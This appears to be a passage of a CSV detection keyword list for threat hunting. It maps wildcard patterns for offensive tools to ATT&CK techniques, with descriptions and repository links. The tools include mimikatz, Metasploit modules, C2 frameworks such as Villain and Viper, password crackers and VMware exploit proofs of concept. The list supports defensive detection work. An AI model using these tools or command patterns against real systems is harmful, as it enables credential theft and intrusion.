T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vault::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vba-macro-mac-persistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*VBA-RunPE -*,offensive_tool_keyword,VBA-RunPE,A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.,T1055 - T1218 - T1059,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/itm4n/VBA-RunPE,1,0,N/A,N/A,8,777,189,2019-12-17T10:32:43Z,2018-01-28T19:50:44Z -*vba-windows-persistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*vbs-obfuscator.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*VbulletinWidgetTemplateRce.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*vcenter_forge_saml_token*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcenter_secrets_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcenter_secrets_dump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcsmap*,offensive_tool_keyword,vcsmap,vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.,T1210.001 - T1190 - T1538,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/melvinsh/vcsmap,1,0,N/A,N/A,2,131,25,2021-08-31T20:47:07Z,2016-08-21T11:23:57Z -*vdi2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vectra-ai-research/MAAD-AF*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*veeam_credential_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*veeam_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Vegile -*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,0,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*venv wapiti3*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*Verified Merlin server *,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*verovaleros/domain_analyzer*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*victim_host_generator.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*VID_03EB&PID_2403 *,offensive_tool_keyword,ducky,rubber ducky,T1021 - T1056.001 - T1060 - T1573 - T1573.002,TA0002 - TA0007 - TA0044,N/A,N/A,Hardware,https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki,1,0,default vid and pid of the device - risk of false positives,10,1,2,0,2015-03-15T02:45:33Z,2015-03-15T02:45:31Z -*VID_0483&PID_5740*,offensive_tool_keyword,FlipperZero,Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body,T1021 - T1056.001 - T1060 - T1573 - T1573.002,TA0002 - TA0007 - TA0044,N/A,N/A,Hardware,https://docs.flipper.net/qflipper/windows-debug,1,0,default vid and pid of the device - risk of false positives,10,10,N/A,N/A,N/A,N/A -*viewdns-get-rootdomains-ip-ns *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*viewdns-get-rootdomains-whois *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*Villain.git*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*villain.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Villain/Core*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*villain_core.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*vincent.letoux@gmail.com*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*viper/*.sock*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viper-dev.conf*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperpython-dev*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperpython-main*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperzip.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*virajkulkarni14*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/virajkulkarni14,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Viralmaniar*,offensive_tool_keyword,Github Username,github username hosting post exploitation tools and recon tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Viralmaniar,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*VirTool:Win32/RemoteExec*,signature_keyword,Antivirus Signature,AV signature often associated with C2 communications (cobaltstrike for example),N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*virusscan_bypass.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*VirusTotalC2.*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*Visual-Studio-BOF-template*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*VITE_STRIKER_API*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*vivaldi* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*VMSA-2023-0001.py*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vmware_view_planner*uploadlog_rce*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vmware_vrni_rce_cve_2023_20887.rb*,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,1,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -*vmware_workspace_one_access_cve_*.rb,offensive_tool_keyword,POC,POC for VMWARE CVE-2022-22954,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb,1,1,N/A,N/A,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*VMware-vRealize-Log-Insight.cert*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vmx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vnc_password_osx.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vnc_passwords.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vncdumpdll*,offensive_tool_keyword,vncpwdump,vnc password sniffer,T1003.003 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://www.codebus.net/d-2v0u.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vncinject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vncpcap2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vncpwdump.*,offensive_tool_keyword,vncpwdump,vnc password sniffer,T1003.003 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://www.codebus.net/d-2v0u.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vncviewer *.*:5901*,greyware_tool_keyword,vncviewer,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*vnperistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional 